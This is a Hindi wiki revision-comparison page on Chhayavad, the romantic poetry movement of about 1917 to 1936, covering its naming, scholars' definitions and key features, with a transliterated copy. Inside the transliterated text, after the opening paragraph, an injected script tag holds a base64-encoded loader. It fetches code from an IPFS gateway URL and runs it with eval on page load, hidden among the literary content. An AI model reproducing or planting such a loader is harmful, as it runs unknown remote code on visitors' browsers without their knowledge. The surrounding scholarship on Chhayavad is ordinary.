Difference between revisions of "छायावाद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''द्विवेदी युग' के पश्चात हिन्दी साहित्य में [[कवित...' के साथ नया पन्ना बनाया)
 
Line 8: Line 8:
 
हिन्दी की कुछ पत्रिकाओं- 'श्रीशारदा' और '[[सरस्वती (पत्रिका)|सरस्वती]]' में क्रमश: सन [[1920]] और [[1921]] में मुकुटधर पांडेय और सुशील द्वारा दो लेख 'हिन्दी में छायावाद' शीर्षक से प्रकाशित हुए थे। अत: कहा जा सकता है कि इस नाम का प्रयोग सन 1920 से या उससे पूर्व से होने लग गया था। संभव है कि मुकुटधर पांडेय ने ही इनका सर्वप्रथम आविष्कार किया हो। यह भी ध्यान रहे कि पांडेय जी ने इसका प्रयोग व्यंग्यात्मक रूप में छायावादी काव्य की अस्पष्टता (छाया) के लिये किया था। किंतु आगे चलकर वही नाम स्वीकृत हो गया। स्वयं छायावादी कवियों ने इस विशेषण को बड़े प्रेम से स्वीकार किया है। एक ओर [[जयशंकर प्रसाद]] लिखते हैं- "मोती के भीतर छाया और तरलता होती है, वैसे ही कांति की तरलता अंग में लावण्य कही जाती है। छाया भारतीय दृष्टि से अनुभूति की भंगिमा पर निर्भर करती है। ध्वन्यात्मकता, लाक्षणिकता, सौन्दर्यमय प्रतीक विधान तथा उपचार वक्रता के साथ अनुभूति की विवृत्ति छायावाद की विशेषताएं हैं। अपने भीतर से पानी की तरह आन्तर स्पर्श करके भाव समर्पण करने वाली अभिव्यक्ति छाया कांतिमय होती है।"
 
हिन्दी की कुछ पत्रिकाओं- 'श्रीशारदा' और '[[सरस्वती (पत्रिका)|सरस्वती]]' में क्रमश: सन [[1920]] और [[1921]] में मुकुटधर पांडेय और सुशील द्वारा दो लेख 'हिन्दी में छायावाद' शीर्षक से प्रकाशित हुए थे। अत: कहा जा सकता है कि इस नाम का प्रयोग सन 1920 से या उससे पूर्व से होने लग गया था। संभव है कि मुकुटधर पांडेय ने ही इनका सर्वप्रथम आविष्कार किया हो। यह भी ध्यान रहे कि पांडेय जी ने इसका प्रयोग व्यंग्यात्मक रूप में छायावादी काव्य की अस्पष्टता (छाया) के लिये किया था। किंतु आगे चलकर वही नाम स्वीकृत हो गया। स्वयं छायावादी कवियों ने इस विशेषण को बड़े प्रेम से स्वीकार किया है। एक ओर [[जयशंकर प्रसाद]] लिखते हैं- "मोती के भीतर छाया और तरलता होती है, वैसे ही कांति की तरलता अंग में लावण्य कही जाती है। छाया भारतीय दृष्टि से अनुभूति की भंगिमा पर निर्भर करती है। ध्वन्यात्मकता, लाक्षणिकता, सौन्दर्यमय प्रतीक विधान तथा उपचार वक्रता के साथ अनुभूति की विवृत्ति छायावाद की विशेषताएं हैं। अपने भीतर से पानी की तरह आन्तर स्पर्श करके भाव समर्पण करने वाली अभिव्यक्ति छाया कांतिमय होती है।"
  
दूसरी ओर [[महादेवी वर्मा]] भी प्रसाद के स्वर में स्वर मिलाती हुई कहती हैं- "सृष्टि के बाह्याकार पर इतना लिखा जा चुका था कि मनुष्य का [[हृदय]] अभिव्यक्ति के लिए रो उठा। स्वछंद छंद में चित्रित उन मानव अनुभूतियों का नाम छाया उपयुक्त ही था और मुझे तो आज भी उपयुक्त लगता है।" जयशंकर प्रसाद और महादेवी वर्मा की इन उक्तियों में कोई तर्क नहीं है। जयशंकर प्रसाद जिन गुणों का आख्यान कर रहे हैं, उसके आधार पर तो इस [[कविता]] का नाम 'प्रकाश', 'चमक' या 'कांति' होना चाहिए था, या महादेवी वर्मा द्वारा परिगणित विशेषता को लेकर इसे अनुभूति भावुकता आदि किसी नाम से पुकारा जाना चाहिए था, किंतु वास्तविकता यह है कि नामकरण के सम्बन्ध में पूर्वजों के आगे किसी का वश नहीं चलता। कविता की तो बात ही क्या, स्वयं कवियों को भी कुछ ऐसे नाम विरासत में मिले हैं कि उन्हें उपनाम ढूंढने को विवश होना पड़ा है। अत: 'छायावाद' नाम को लेकर ज्यादा ऊहापोह करना अनावश्यक है।<ref>{{cite web |url=http://books.google.co.in/books?id=Qy_TnHU5zbAC&pg=PT507&lpg=PT507&dq=%E0%A4%9B%E0%A4%BE%E0%A4%AF%E0%A4%BE%E0%A4%B5%E0%A4%BE%E0%A4%A6&source=bl&ots=eZSx_V_SN6&sig=-wC8y6v9GzUaVmjz_UgUvm03-Gs&hl=hi&sa=X&ei=50BFUqSlC8W5rgfL84CIBw&ved=0CEgQ6AEwBDgU#v=onepage&q=%E0%A4%9B%E0%A4%BE%E0%A4%AF%E0%A4%BE%E0%A4%B5%E0%A4%BE%E0%A4%A6&f=false|title=छायावाद और हिन्दी काव्य|accessmonthday= 04 अक्टूबर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
+
दूसरी ओर [[महादेवी वर्मा]] भी प्रसाद के स्वर में स्वर मिलाती हुई कहती हैं- "सृष्टि के बाह्याकार पर इतना लिखा जा चुका था कि मनुष्य का [[हृदय]] अभिव्यक्ति के लिए रो उठा। स्वछंद छंद में चित्रित उन मानव अनुभूतियों का नाम छाया उपयुक्त ही था और मुझे तो आज भी उपयुक्त लगता है।" जयशंकर प्रसाद और महादेवी वर्मा की इन उक्तियों में कोई तर्क नहीं है। जयशंकर प्रसाद जिन गुणों का आख्यान कर रहे हैं, उसके आधार पर तो इस [[कविता]] का नाम 'प्रकाश', 'चमक' या 'कांति' होना चाहिए था, या महादेवी वर्मा द्वारा परिगणित विशेषता को लेकर इसे अनुभूति भावुकता आदि किसी नाम से पुकारा जाना चाहिए था, किंतु वास्तविकता यह है कि नामकरण के सम्बन्ध में पूर्वजों के आगे किसी का वश नहीं चलता। कविता की तो बात ही क्या, स्वयं कवियों को भी कुछ ऐसे नाम विरासत में मिले हैं कि उन्हें उपनाम ढूंढने को विवश होना पड़ा है। अत: 'छायावाद' नाम को लेकर ज्यादा ऊहापोह करना अनावश्यक है।<ref name="aa">{{cite web |url=http://books.google.co.in/books?id=Qy_TnHU5zbAC&pg=PT507&lpg=PT507&dq=%E0%A4%9B%E0%A4%BE%E0%A4%AF%E0%A4%BE%E0%A4%B5%E0%A4%BE%E0%A4%A6&source=bl&ots=eZSx_V_SN6&sig=-wC8y6v9GzUaVmjz_UgUvm03-Gs&hl=hi&sa=X&ei=50BFUqSlC8W5rgfL84CIBw&ved=0CEgQ6AEwBDgU#v=onepage&q=%E0%A4%9B%E0%A4%BE%E0%A4%AF%E0%A4%BE%E0%A4%B5%E0%A4%BE%E0%A4%A6&f=false|title=छायावाद और हिन्दी काव्य|accessmonthday= 04 अक्टूबर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
 
==परिभाषाएँ==
 
==परिभाषाएँ==
 
'छायावाद' का नामकरण भले ही बिना सोचे समझे कर दिया गया हो, किंतु परिभाषाओं की दृष्टि से यह बड़ा सौभाग्यशाली है। विभिन्न विद्वानों ने अपने अपने ढंग से छायावाद की इतनी अधिक और विचित्र परिभाषाएँ दी हैं कि उन्हें पढ़कर चाहे 'छायावाद' समझ में आये या न आये, पाठक के मस्तिष्क पर अवश्य 'छायावाद' छा जाता है। 'छायावाद' अपने युग की अत्यंत व्यापक प्रवृत्ति रही है। फिर भी यह देख कर आश्चर्य होता है कि उसकी परिभाषा के संबंध में विचारकों और समालोचकों में एकमत नहीं हो सका।<ref>{{cite web |url=http://hindikaitihaas.blogspot.in/2011/10/blog-post_19.html|title=छायावाद क्या है|accessmonthday= 04 अक्टूबर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref> विभिन्न विद्वानों ने 'छायावाद' की भिन्न-भिन्न परिभाषाएँ की हैं-  
 
'छायावाद' का नामकरण भले ही बिना सोचे समझे कर दिया गया हो, किंतु परिभाषाओं की दृष्टि से यह बड़ा सौभाग्यशाली है। विभिन्न विद्वानों ने अपने अपने ढंग से छायावाद की इतनी अधिक और विचित्र परिभाषाएँ दी हैं कि उन्हें पढ़कर चाहे 'छायावाद' समझ में आये या न आये, पाठक के मस्तिष्क पर अवश्य 'छायावाद' छा जाता है। 'छायावाद' अपने युग की अत्यंत व्यापक प्रवृत्ति रही है। फिर भी यह देख कर आश्चर्य होता है कि उसकी परिभाषा के संबंध में विचारकों और समालोचकों में एकमत नहीं हो सका।<ref>{{cite web |url=http://hindikaitihaas.blogspot.in/2011/10/blog-post_19.html|title=छायावाद क्या है|accessmonthday= 04 अक्टूबर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref> विभिन्न विद्वानों ने 'छायावाद' की भिन्न-भिन्न परिभाषाएँ की हैं-  
Line 23: Line 23:
  
 
उपर्युक्त परिभाषाओं से 'छायावाद' की अनेक परिभाषाएँ स्पष्ट होती हैं, किंतु एक सर्वसम्मत परिभाषा नहीं बन सकी। उपरिलिखित परिभाषाओं से यह भी व्यक्त होता है कि 'छायावाद' स्वच्छंदतावाद (रोमांटिसिज्म) के काफी समीप है। उपर्युक्त परिभाषाओ को समन्वित करते हुए यह कहा जा सकता है कि "संसार के प्रत्येक पदार्थ में [[आत्मा]] के दर्शन करके तथा प्रत्येक प्राण में एक ही आत्मा की अनुभूति करके इस दर्शन और अनुभूति को लाक्षणिक और प्रतीक शैली द्वारा व्यक्त करना ही 'छायावाद' है।" [[आधुनिक काल]] के 'छायावाद' का निर्माण भारतीय और यूरोपिय भावनाओं के मेल से हुआ है, क्योंकि उसमें एक ओर तो सर्वत्र एक ही आत्मा के दर्शन की भारतीय भावना है और दूसरी ओर उस बाहरी स्थूल जगत के प्रति विद्रोह है, जो पश्चिमी विज्ञान की प्रगति के कारण अशांत एवं दु:खी है।
 
उपर्युक्त परिभाषाओं से 'छायावाद' की अनेक परिभाषाएँ स्पष्ट होती हैं, किंतु एक सर्वसम्मत परिभाषा नहीं बन सकी। उपरिलिखित परिभाषाओं से यह भी व्यक्त होता है कि 'छायावाद' स्वच्छंदतावाद (रोमांटिसिज्म) के काफी समीप है। उपर्युक्त परिभाषाओ को समन्वित करते हुए यह कहा जा सकता है कि "संसार के प्रत्येक पदार्थ में [[आत्मा]] के दर्शन करके तथा प्रत्येक प्राण में एक ही आत्मा की अनुभूति करके इस दर्शन और अनुभूति को लाक्षणिक और प्रतीक शैली द्वारा व्यक्त करना ही 'छायावाद' है।" [[आधुनिक काल]] के 'छायावाद' का निर्माण भारतीय और यूरोपिय भावनाओं के मेल से हुआ है, क्योंकि उसमें एक ओर तो सर्वत्र एक ही आत्मा के दर्शन की भारतीय भावना है और दूसरी ओर उस बाहरी स्थूल जगत के प्रति विद्रोह है, जो पश्चिमी विज्ञान की प्रगति के कारण अशांत एवं दु:खी है।
 +
====महत्त्वपूर्ण तथ्य====
 +
विद्वानों द्वारा दी गई परिभाषाओं से 'छायावाद' के सम्बन्ध में अनेक महत्त्वपूर्ण बातें ज्ञात होती हैं-
 +
#'छायावाद' और 'रहस्यवाद' एक हैं।
 +
#'छायावाद' एक शैली विशेष है।
 +
#प्रकृति में छायावाद मानव जीवन का प्रतिबिम्ब देखता है अर्थात् प्रकृति का मानवीकरण करता है।
 +
#यह एक दार्शनिक अनुभूति है।
 +
#छायावाद एक भावात्मक दृष्टिकोण है।
 +
#प्रकृति में छायावाद आध्यात्मिक सौन्दर्य का दर्शन करता है।
 +
#गति तत्त्व की छायावाद में प्रमुखता है।
 +
#छायावाद में प्रकृति का चित्रण होता है।
 +
#छायावाद स्थूल के प्रति सूक्ष्म का विद्रोह है।<ref name="aa"/>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 13:03, 4 October 2013

'dvivedi yug' ke pashchat hindi sahity mean kavita ki jo dhara pravahit huee, vah chhayavadi kavita ke nam se prasiddh huee. 'chhayavad' ki kalavadhi san 1917 se 1936 tak mani gee hai. vastut: is kalavadhi mean 'chhayavad' itani pramukh pravritti rahi hai ki sabhi kavi isase prabhavit hue aur isake nam par hi is yug ko 'chhayavadi yug' kaha jane laga tha. 1916 ee. ke as-pas hindi mean kalpanapoorn, svachchhand aur bhavukata ki ek lahar um d p di. bhasha, bhav, shaili, chhand, alankar in sab drishtiyoan se purani kavita se isaka koee mel nahian tha. alochakoan ne ise 'chhayavad' ya 'chhayavadi kavita' ka nam diya. 'chhayavad' shabd ka sabase pahale prayog mukutadhar pandey ne kiya. is yug ki hindi kavita ke aantarang aur bahirang mean ekadam parivartan ho gaya. vastu niroopan ke sthan par anubhooti niroopan ko pradhanata prapt huee thi. prakriti ka pranamay pradesh kavita mean aya. jayashankar prasad, sooryakaant tripathi 'nirala', sumitranandan pant aur mahadevi varma is yug ke char pramukh stanbh the.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

kya hai chhayavad?

'chhayavad' ke svaroop ko samajhane ke lie us prishthabhoomi ko samajh lena avashyak hai, jisane use janm diya. sahity ke kshetr mean pray: ek niyam dekha jata hai ki poorvavarti yug ke abhavoan ko door karane ke lie paravarti yug ka janm hota hai. 'chhayavad' ke mool mean bhi yahi niyam kam kar raha hai. isase poorv 'dvivedi yug' mean hindi kavita kori upadesh matr ban gee thi. usamean samaj sudhar ki charcha vyapak roop se ki jati thi aur kuchh akhyanoan ka varnan kiya jata tha. upadeshatmakata aur naitikata ki pradhanata ke karan kavita mean nirasata a gee. kavi ka hriday us nirasata se oob gaya aur kavita mean sarasata lane ke lie vah chhatapata utha. isake lie usane prakriti ko madhyam banaya. prakriti ke madhyam se jab manav-bhavanaoan ka chitran hone laga, tabhi 'chhayavad' ka janm hua aur kavita 'itivrittatmakata' ko chho dakar kalpana lok mean vicharan karane lagi.

hindi kavita ke kshetr mean pratham mahayuddh (1914-1918 ee.) ke asapas ek vishesh kavy dhara ka pravartan hua, jise 'chhayavad' ki sanjna di gee hai. yah namakaran kis adhar par tatha kisake dvara kiya gaya, is sambandh mean nishchit roop se kuchh kahana kathin hai. jahaan tak 'chhaya' aur 'vad' ka sambandh hai, chhayavad kavy ke svaroop ya usake lakshanoan se inaka koee mel nahian hai. achary ramachandr shukl ka vishvas tha ki bangala mean adhyatmik pratikavadi rachanaoan ko 'chhayavad' kaha jata tha. at: hindi mean bhi is prakar ki kavitaoan ka nam 'chhayavad' chal p da, kiantu hajariprasad dvivedi ne is manyata ka khandan karate hue kaha hai ki- "bangala mean chhayavad nam kabhi chala hi nahian".

chhayavad shabd ka pratham prayog

hindi ki kuchh patrikaoan- 'shrisharada' aur 'sarasvati' mean kramash: san 1920 aur 1921 mean mukutadhar paandey aur sushil dvara do lekh 'hindi mean chhayavad' shirshak se prakashit hue the. at: kaha ja sakata hai ki is nam ka prayog san 1920 se ya usase poorv se hone lag gaya tha. sanbhav hai ki mukutadhar paandey ne hi inaka sarvapratham avishkar kiya ho. yah bhi dhyan rahe ki paandey ji ne isaka prayog vyangyatmak roop mean chhayavadi kavy ki aspashtata (chhaya) ke liye kiya tha. kiantu age chalakar vahi nam svikrit ho gaya. svayan chhayavadi kaviyoan ne is visheshan ko b de prem se svikar kiya hai. ek or jayashankar prasad likhate haian- "moti ke bhitar chhaya aur taralata hoti hai, vaise hi kaanti ki taralata aang mean lavany kahi jati hai. chhaya bharatiy drishti se anubhooti ki bhangima par nirbhar karati hai. dhvanyatmakata, lakshanikata, saundaryamay pratik vidhan tatha upachar vakrata ke sath anubhooti ki vivritti chhayavad ki visheshataean haian. apane bhitar se pani ki tarah antar sparsh karake bhav samarpan karane vali abhivyakti chhaya kaantimay hoti hai."

doosari or mahadevi varma bhi prasad ke svar mean svar milati huee kahati haian- "srishti ke bahyakar par itana likha ja chuka tha ki manushy ka hriday abhivyakti ke lie ro utha. svachhand chhand mean chitrit un manav anubhootiyoan ka nam chhaya upayukt hi tha aur mujhe to aj bhi upayukt lagata hai." jayashankar prasad aur mahadevi varma ki in uktiyoan mean koee tark nahian hai. jayashankar prasad jin gunoan ka akhyan kar rahe haian, usake adhar par to is kavita ka nam 'prakash', 'chamak' ya 'kaanti' hona chahie tha, ya mahadevi varma dvara pariganit visheshata ko lekar ise anubhooti bhavukata adi kisi nam se pukara jana chahie tha, kiantu vastavikata yah hai ki namakaran ke sambandh mean poorvajoan ke age kisi ka vash nahian chalata. kavita ki to bat hi kya, svayan kaviyoan ko bhi kuchh aise nam virasat mean mile haian ki unhean upanam dhooandhane ko vivash hona p da hai. at: 'chhayavad' nam ko lekar jyada oohapoh karana anavashyak hai.[1]

paribhashaean

'chhayavad' ka namakaran bhale hi bina soche samajhe kar diya gaya ho, kiantu paribhashaoan ki drishti se yah b da saubhagyashali hai. vibhinn vidvanoan ne apane apane dhang se chhayavad ki itani adhik aur vichitr paribhashaean di haian ki unhean padhakar chahe 'chhayavad' samajh mean aye ya n aye, pathak ke mastishk par avashy 'chhayavad' chha jata hai. 'chhayavad' apane yug ki atyant vyapak pravritti rahi hai. phir bhi yah dekh kar ashchary hota hai ki usaki paribhasha ke sanbandh mean vicharakoan aur samalochakoan mean ekamat nahian ho saka.[2] vibhinn vidvanoan ne 'chhayavad' ki bhinn-bhinn paribhashaean ki haian-

  • achary ramachandr shukl ne 'chhayavad' ko spasht karate hue likha hai ki- "chhayavad shabd ka prayog do arthoan mean samajhana chahie. ek to 'rahasyavad' ke arth mean, jahaan usaka sanbandh kavy-vastu se hota hai arthath jahaan kavi us anant aur ajnat priyatam ko ko alamban banakar atyant chitramayi bhasha mean prem ki anek prakar se vyanjana karata hai. 'chhayavad' shabd ka doosara prayog kavy shaili ya paddhati-vishesh ke vyapak arth mean hai.... 'chhayavad' ek shaili vishesh hai, jo lakshanik prayogoan, aprastut vidhanoan aur amoort upamanoan ko lekar chalati hai." doosare arth mean unhoanne 'chhayavad' ko chitr-bhasha-shaili kaha hai.
  • mahadevi varma ne 'chhayavad' ka mool sarvatmavad darshan mean mana hai. unhoanne likha hai ki- "chhayavad ka kavi dharm ke adhyatm se adhik darshan ke brahm ka rrini hai, jo moort aur amoort vishv ko milakar poornata pata hai. anyatr ve likhati haian ki- "chhayavad prakriti ke bich jivan ka udh-gith hai".
  • d aau. ram kumar varma ne 'chhayavad' aur 'rahasyavad' mean koee aantar nahian mana hai. 'chhayavad' ke vishay mean unake shabd haian- "atma aur paramatma ka gupt vagvilas rahasyavad hai aur vahi chhayavad hai. ek any sthal par ve likhate haian- "chhayavad ya rahasyavad jivatma ki us aantarnihit pravritti ka prakashan hai, jisamean vah divy aur alaukik satta se apana shaant aur nishchal sanbandh jo dana chahati hai aur yah sanbandh itana badh jata hai ki donoan mean kuchh aantar hi nahian rah jata hai. paramatma ki chhaya atma par p dane lagati hai aur atma ki chhaya paramatma par. yahi chhayavad hai."
  • achary nandadulare vajapeyi ka mantavy hai- "manav athava prakriti ke sookshm kiantu vyakt sauandary mean adhyatmik chhaya ka bhan mere vichar se 'chhayavad' ki ek sarvamany vyakhya ho sakati hai. 'chhayavad' ki vyaktigat visheshata do roopoan mean dikh p dati hai- ek sookshm aur kalpanik anubhooti ke prakash mean aur doosari lakshanik aur pratikatmak shabdoan ke prayog mean. aur is adhar par to yah kaha hi ja sakata hai ki 'chhayavad' adhunik hindi-kavita ki vah shaili hai, jisamean sookshm aur kalpanik sahanubhooti ko lakshanik evan pratikatmak dhang par prakashit karate haian."
  • shaantipriy dvivedi ne 'chhayavad' aur 'rahasyavad' mean gahara sanbandh sthapit karate hue kaha hai- "jis prakar 'maitar aauf phaikt' (itivrittatmak) ke age ki chij chhayavad hai, usi prakar chhayavad ke age ki chij rahasyavad hai."
  • gangaprasad paandey ne 'chhayavad' par is prakar se prakash dala hai- "chhayavad nam se hi usaki chhayatmakata spasht hai. vishv ki kisi vastu mean ek ajnat sapran chhaya ki jhaanki pana athava usaka arop karana hi 'chhayavad' hai. jis prakar chhaya sthool vastuvad ke age ki chij hai, usi prakar rahasyavad 'chhayavad' ke age ki chij hai."
  • jayashankar prasad ne 'chhayavad' ko apane dhag se paribhashit karate hue kaha hai- "kavita ke kshetr mean pauranik yug ki kisi ghatana athava desh-videsh ki suandari ke bahy varnan se bhinn jab vedana ke adhar par svanubhootimayi abhivyakti hone lagi, tab hindi mean use 'chhayavad' ke nam se abhihit kiya gaya."
  • d aau. devaraj chhayavad ko adhunik pauranik dharmik chetana ke viruddh adhunik laukik chetana ka vidroh svikar karate haian.
  • d aau. nagendr 'chhayavad' ko sthool ke prati sookshm ka vidroh manate haian aur sath hi yah bhi svikar karate haian ki- "chhayavad ek vishesh prakar ki bhav-paddhati hai. jivan ke prati ek vishesh prakar ka bhavatmak drishtikon hai. unhoanne isaki mool pravritti ke vishay mean likha hai ki vastav par aantarmukhi drishti dalate hue, usako vayavi athava atindriy roop dene ki pravritti hi mool vritti hai. unake vichar se, yug ki udabuddh chetana ne bahy abhivyakti se nirash hokar jo atmabaddh aantarmukhi sadhana aranbh ki vah kavy mean 'chhayavad' ke roop mean abhivyakt huee. ve 'chhayavad' ko atript vasana aur manasik kuanthaoan ka parinam svikar karate haian.
  • d aau. namavar sianh ne apani pustak "chhayavad" mean vishvasaniy taur par dikhaya ki 'chhayavad' vastut: kee kavy pravrittiyoan ka samoohik nam hai aur vah us "rashtriy jagaran ki kavyatmak abhivyakti" hai, jo ek or purani rudhiyoan se mukti pana chahata tha aur doosari or videshi paradhinata se.

uparyukt paribhashaoan se 'chhayavad' ki anek paribhashaean spasht hoti haian, kiantu ek sarvasammat paribhasha nahian ban saki. uparilikhit paribhashaoan se yah bhi vyakt hota hai ki 'chhayavad' svachchhandatavad (romaantisijm) ke kaphi samip hai. uparyukt paribhashao ko samanvit karate hue yah kaha ja sakata hai ki "sansar ke pratyek padarth mean atma ke darshan karake tatha pratyek pran mean ek hi atma ki anubhooti karake is darshan aur anubhooti ko lakshanik aur pratik shaili dvara vyakt karana hi 'chhayavad' hai." adhunik kal ke 'chhayavad' ka nirman bharatiy aur yooropiy bhavanaoan ke mel se hua hai, kyoanki usamean ek or to sarvatr ek hi atma ke darshan ki bharatiy bhavana hai aur doosari or us bahari sthool jagat ke prati vidroh hai, jo pashchimi vijnan ki pragati ke karan ashaant evan du:khi hai.

mahattvapoorn tathy

vidvanoan dvara di gee paribhashaoan se 'chhayavad' ke sambandh mean anek mahattvapoorn batean jnat hoti haian-

  1. 'chhayavad' aur 'rahasyavad' ek haian.
  2. 'chhayavad' ek shaili vishesh hai.
  3. prakriti mean chhayavad manav jivan ka pratibimb dekhata hai arthath prakriti ka manavikaran karata hai.
  4. yah ek darshanik anubhooti hai.
  5. chhayavad ek bhavatmak drishtikon hai.
  6. prakriti mean chhayavad adhyatmik saundary ka darshan karata hai.
  7. gati tattv ki chhayavad mean pramukhata hai.
  8. chhayavad mean prakriti ka chitran hota hai.
  9. chhayavad sthool ke prati sookshm ka vidroh hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 chhayavad aur hindi kavy (hindi). . abhigaman tithi: 04 aktoobar, 2013.
  2. chhayavad kya hai (hindi). . abhigaman tithi: 04 aktoobar, 2013.

sanbandhit lekh